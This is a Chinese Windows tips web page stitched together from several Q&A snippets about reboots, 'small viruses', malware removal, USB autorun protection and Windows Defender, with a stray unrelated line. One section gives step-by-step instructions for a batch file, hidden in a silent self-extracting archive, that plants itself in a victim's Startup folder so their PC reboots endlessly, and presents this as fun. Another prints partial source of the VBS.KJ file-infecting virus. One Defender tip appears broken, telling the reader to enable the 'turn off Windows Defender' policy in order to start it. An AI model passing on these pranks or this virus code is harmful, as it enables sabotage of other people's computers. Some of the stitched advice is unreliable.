windows之家1.怎么制作和发送重启小病毒?
电脑为什么自动重启或者电脑自动关机是什么原因?一、软件1.病毒破坏比较典型的就是前一段时间对全球计算机造成严重破坏的“冲击波”病毒,发作时还会提示系统将在60秒后自动启动。其实,早在DOS时代就有不少病毒能够自动重启你的计算机。对于是否属于病毒破坏,我们可以使用最新版的杀毒软件进行杀毒,一般都会发现病毒存在。当然,还有一种可能是当你上网时被人恶意侵入了你的计算机,并放置了木马程序。这样对方能够从远程控制你计算机的一切活动,当然也包括让你的计算机重新启动。对于有些木马,不容易清除,最好重新安装操作系统。2.系统文件损坏当系统文件被破坏时,如Win2K下的KERNEL32.DLL,Win98下的FONTS目录下面的字体等系统运行时基本的文件被破坏,系统在启动时会因此无法完成初始化而强迫重新启动。你可以做个试验,把WIN98目录下的字库“FONTS”改名试一试。当你再次开机时,我们的计算机就会不断的重复启动。对于这种故障,因为无法进入正常的桌面,只能覆盖安装或重新安装。3.定时软件或计划任务软件起作用如果你在“计划任务栏”里设置了重新启动或加载某些工作程序时,当定时时刻到来时,计算机也会再次启动。对于这种情况,我们可以打开“启动”项,检查里面有没有自己不熟悉的执行文件或其他定时工作程序,将其屏蔽后再开机检查。当然,我们也可以在“运行”里面直接输入“Msconfig”命令选择启动项。二、硬件1.市电电压不稳解决方法:对于经常性供电不稳的地区,我们可以购置UPS电源或130-260V的宽幅开关电源来保证计算机稳定工作。2.插排或电源插座的质量差,接触不良解决方法:① 不要图省钱而购买价廉不物美的电源排插,购买一些名牌的电源插排,因为其内部都是机器自动安装压接的,没有采用手工焊接。② 对于是否属于墙壁插座内部虚接的问题,我们可以把主机换一个墙壁插座试一试,看是否存在同样的自动重启问题。3.计算机电源的功率不足或性能差解决方法:现换高质量大功率计算机电源。4.主机开关电源的市电插头松动,接触不良,没有插紧解决方法:更换优质的3C认证电源线。5.主板的电源ATX20插座有虚焊,接触不良解决方法:① 如果是主板焊点虚焊,直接用电烙铁补焊就可以了。注意:在对主板、硬盘、显卡等计算机板卡焊接时,一定要将电烙铁良好接地,或者在焊接时拔下电源插头。② 如果是电源的问题,最好是更换一台好的电源。6.CPU问题CPU内部部分功能电路损坏,二级缓存损坏时,计算机也能启动,甚至还会进入正常的桌面进行正常操作,但当进行某一特殊功能时就会重启或死机,如画表,播放VCD,玩游戏等。解决办法:试着在CMOS中屏蔽二级缓存(L2)或一级缓存(L1),看主机是否能够正常运行;再不就是直接用好的CPU进行替换排除。如果屏蔽后能够正常运行,还是可以凑合着使用,虽然速度慢些,但必竟省钱了。7.内存问题内存条上如果某个芯片不完全损坏时,很有可能会通过自检(必竟多数都设置了POST),但是在运行时就会因为内存发热量大而导致功能失效而意外重启。多数时候内存损坏时开机会报警,但内存损坏后不报警,不加电的故障都还是有的。最好使用排除法,能够快速确定故障部位。8.光驱问题如果光驱内部损坏时,也会导致主机启动缓慢或不能通过自检,也可能是在工作过程中突然重启。对于后一种情况如果是我们更换了光驱后出现的,很有可能是光驱的耗电量不同而引起的。大家需要了解的是,虽然光驱的ATPI接口相同,但不同生产厂家其引脚定义是不相同的,如果我们的硬盘线有问题时,就可能产生对某一牌子光驱使用没有问题,但对其他牌子光驱就无法工作的情况,这需要大家注意。9.RESET键质量有问题如果RESET开关损坏,内部簧片始终处于短接的位置时,主机就无法加电自检。但是当RESET开关弹性减弱或机箱上的按钮按下去不易弹起时,就会出现在使用过程中,因为偶尔的触碰机箱或者在正常使用状态下而主机突然重启。所以,当RESET开关不能按动自如时,我们一定要仔细检查,最好更换新的 RESET按钮开关或对机箱的外部按钮进行加油润滑处理。还有一种情况,是因为机箱内的RESET开关引线在焊接时绝缘层剥离过多,再加上使用过程中多次拆箱就会造成RESET开关线距离过近而引起碰撞,导致主机自动重启。10.接入网卡或并口、串口、USB接口接入外部设备时自动重
开心影院欢迎您!
2.怎样制作一个小病毒?
右键--新建快捷方式--项目地址 %windir%\system32\shutdown.exe -s -t 0 下一步保存就行了这是自动关机的,最后的0是关机延时你可以改成50或10
还有一种,网上刚找,原理差不多,但比我那个高级:
新建一个文本文档,在其中输入“shutdown -r -t 30”(不包含双引号)然后保存为扩展名为.bat的文件。
一旦运行这个文件桌面就会弹出一个倒计时30秒重启的对话框。我们还可以再修改一下,把“-r”改成“-s”(不包含双引号)这样在运行后就只是关机而不重启。注意:其中的30是关机或重启的倒计时时间,你可以随便改。
我们还可以再进行加工,就是让它在每次开机时自动运行,步骤如下:
步骤1、右击这个文件,在弹出的快捷菜单中选择“添加到压缩文件”。
步骤2、双击打开这个压缩文件,工具栏中选择“自解压格式”。
步骤3、在出现的自解压设置中点击“高级自解压选项”,然后在解压后运行中输入刚才保存的那个文件名,在解压路径输入:C:\Documents and Settings\Administrator\[开始] 菜单\程序\启动”。
步骤4、在模式中的安静模式选择“全部隐藏”。最后点击确定即可生成一个自解压文件。
这样我在运行这个自解压文件时就会自动运行那个病毒文件,并将其解压到启动文件夹中,让其在每次开机时都运行。对方在运行我们制作的病毒后他的电脑就会不间断的重启,是不是很好玩呀!
要想不重启只要在dos下输入“shutdown -a”回车,然后再把启动文件夹中的病毒删除即可。
3.怎样用Windows自带记事本搞定病毒?
电脑中毒后,许多朋友会打开“进程管理器”,将几个不太熟悉的程序关闭掉,但有时会碰到这种情况:关掉一个,再去关闭另外一个时,刚才关闭的那个马上又运行了。
再从注册表里先把启动项删除后,重启试试,刚删除的那些启动项又还原了。 由于电脑只装一个操作系统,也没办法在另一个系统下删除这些病毒。
上网下载专杀工具后,仍然不能杀掉。 如此翻来覆去,病毒未杀掉,人却濒临崩溃。
这时怎么办呢? 遇到这种情况,在此向大家推荐一种方法,在XP、Vista和Windows7系统下都适用。
第一步:在“开始→运行”中输入CMD,打开“命令提示符”窗口。 第二步:输入ftype exefile=notepad。
exe %1,这句话的意思是将所有的EXE文件用“记事本”打开。这样原来的病毒就无法启动了。
第三步:重启电脑,你会看见打开了许多“记事本”。当然,这其中不仅有病毒文件,还有一些原来的系统文件,比如:输入法程序。
第四步:右击任何文件,选择“打开方式”,然后点击“浏览”,转到WindowsSystem32下,选择cmd。exe,这样就可以再次打开“命令提示符”窗口。
第五步:运行ftype exefile=%1 %*,将所有的EXE文件关联还原。 现在运行杀毒软件或直接改回注册表,就可以杀掉病毒了。
第六步:在每一个“记事本”中,点击菜单中的“文件→另存为”,就可看到了路径以及文件名了。找到病毒文件,手动删除即可,但得小心,必须确定那是病毒才能删除。
建议将这些文件改名并记下,重启后,如果没有病毒作怪,也没有系统问题,再进行删除, 附:Ftype的用法 在Windows中,Ftype命令用来显示及修改不同扩展名文件所关联的打开程序。 相当于在注册表编辑器中修改“HKEY_CLASSES_ROOT”项下的部分内容一样。
Ftype的基本使用格式为:Ftype [文件类型[=[打开方式/程序]]] 比如:像上例中的ftype exefile=notepad。exe %1,表示将所有文件类型为EXE(exefile表示为EXE类型文件)的文件都通过“记事本”程序打开,后面的%1表示要打开的程序本身(就是双击时的那个程序)。
4.Win10系统下如何制作绝对安全无毒的U盘
既然病毒是依靠改写autorun这个文件进行传播,那最最简单的方法就是在U盘上建个无法进行任何操作的autorun.inf就好了。
先把U盘插到电脑上,看看系统给它分配的是哪个盘符。然后打开命令提示符(管理员),输入md F:\autorun.infU盘里面就多出了个autorun.inf文件夹。
继续输入cd /d F:\autorun.inf进入新建的文件夹路径后,输入md 安全文件夹。\\。
OK,现在就建立好了无法被改写删除的autorun了哦。无法被删除也无法被改写,小病毒是无能为力的。
大家想要删除它的话,直接格式化就好了,简单吧?。
5.怎样制造电脑小病毒
那就看看vbs.kj的源码
Dim InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,FinalyDisk
Sub KJ_start()
\' 初始化变量
KJSetDim()
\' 初始化环境
KJCreateMilieu()
\' 感染本地或者共享上与html所在目录
KJLikeIt()
\' 通过vbs感染Outlook邮件模板
KJCreateMail()
\' 进行病毒传播
KJPropagate()
End Sub
\' 函数:KJAppendTo(FilePath,TypeStr)
\' 功能:向指定类型的指定文件追加病毒
\' 参数:
\' FilePath 指定文件路径
\' TypeStr 指定类型
Function KJAppendTo(FilePath,TypeStr)
On Error Resume Next
\' 以只读方式打开指定文件
Set ReadTemp = FSO.OpenTextFile(FilePath,1)
\' 将文件内容读入到TmpStr变量中
TmpStr = ReadTemp.ReadAll
\' 判断文件中是否存在“KJ_start()“字符串,若存在说明已经感染,退出函数;
\' 若文件长度小于1,也退出函数。
If Instr(TmpStr,“KJ_start()“) <> 0 Or Len(TmpStr) < 1 Then
ReadTemp.Close
Exit Function
End If
\' 如果传过来的类型是“htt“
\' 在文件头加上调用页面的时候加载KJ_start()函数;
\' 在文件尾追加html版本的加密病毒体。
\' 如果是“html“
\' 在文件尾追加调用页面的时候加载KJ_start()函数和html版本的病毒体;
\' 如果是“vbs“
\' 在文件尾追加vbs版本的病毒体
If TypeStr = “htt“ Then
ReadTemp.Close
Set FileTemp = FSO.OpenTextFile(FilePath,2)
FileTemp.Write “<“ & “BODY onl oad=“““ & “vbscript:“ & “KJ_start()“““ & “>“ & vbCrLf & TmpStr & vbCrLf & HtmlText
FileTemp.Close
Set FAttrib = FSO.GetFile(FilePath)
FAttrib.attributes = 34
Else
ReadTemp.Close
Set FileTemp = FSO.OpenTextFile(FilePath,8)
If TypeStr = “html“ Then
FileTemp.Write vbCrLf & “<“ & “HTML>“ & vbCrLf & “<“ & “BODY onl oad=“““ & “vbscript:“ & “KJ_start()“““ & “>“ & vbCrLf & HtmlText
ElseIf TypeStr = “vbs“ Then
FileTemp.Write vbCrLf & VbsText
End If
6.win10系统里Windows Defender怎么设置
1. 手动调用Defender的方法
Windows Defender藏在Windows 10的后台,安全的时候它一般不会出来,只有当发现问题,它才会自动跳出来提醒处理。但若要手动全盘扫描,需要临时调出这个软件,还要到系统“纵深”方向去摸索寻找。
Windows Defender藏得比较深。按照常规办法,点击“开始”菜单的“所有程序”,然后再定位到“Windows系统”分支,在下面才能找到它的影子。此外,在系统设置的“更新和安全”分组窗口中,选择Windows Defender项并将右侧列表移动到最底部,也才能看到打开Windows Defender的文字链接。
小提示:
默认情况下,系统升级程序会自动更新Windows Defender的病毒库。如果电脑设置为未受保护状态,病毒库未进行更新,就不能实现最新保护。这时,可点击“更新→更新定义”按钮,对病毒和间谍软件定义进行手动更新。
2. 建立快捷查杀的启动方式
Windows Defender藏得较深,调用不方便,我们可以为其建立快捷方式,以方便调用。将Windows Defender快捷方式添加到桌面或任务栏,调用起来就方便多了。
搜索系统分区“C:Program FilesWindows Defender”文件夹,找到MSASCui.exe文件并右击,选择“发送到→桌面快捷方式”,可在桌面上建立启动Windows Defender的快捷方式。为便于识别,可将快捷方式更名为Windows Defender。
Windows Defender启动后其图标会显示在任务栏托盘,但关闭之后该图标随即会消失。为此,可通过修改注册表让其常驻任务栏。启动注册表编辑器并定位到“HKEY_CURRENT_”,在右侧窗格右击新建“字符串值”并重命名为“Windows Defender”,双击设置其数值数据为“"%ProgramFiles%Windows DefenderMSASCui.exe"-runkey”(注意是半角引号)。重启资源管理器之后,安全软件图标就会出现在任务栏上了。
小提示:
在最新版的Windows 10中,Windows Defender自动在系统资源管理器中添加了右键查杀的项目,这样针对具体的文件夹查杀,就又多了一个快捷入口,不用为了查杀一个文件启动通盘查杀了。
3. 离线应急启动Defender
如果Windows系统因病毒造成无法启动,也就失去了靠其自身的功能查杀的能力。此时,可用提前制作好的离线版Defender进行查杀。离线版的制作需要先通过微软网站下载Windows Defender离线版工具,运行并创建启动闪存盘或光盘。用此移动介质启动电脑后,查杀电脑中存在的恶意软件,抢救出有用的数据。
小提示:
从Windows 10 RedStone预览版14271起,Windows Defender新增内置版“离线杀毒”功能,用户不需要手动制作闪存盘或光盘启动介质,也可以直接进入安全环境来查杀病毒。
4. Defender服务无法启动?
第三方的杀毒软件接管了系统安全之后,Windows自带的Windows Defender软件服务会随之关闭。之后,如果想要开启Windows Defender服务,可能会遇到服务无法启动的问题。
遇到这种情况,可执行GPEDIT.MSC启动组策略,依次定位到“计算机配置→管理模板→Windows组件→Windows Defender”,在右侧窗格找到“关闭Windows defender”;双击该项并在弹出的对话框中点击“已启用”,确定即可。需要注意的是,有些杀毒软件与Windows Defender的冲突是无解的,哪怕使用本文的方案也无法开启。
转载请注明出处windows之家 » win10如何制作小病毒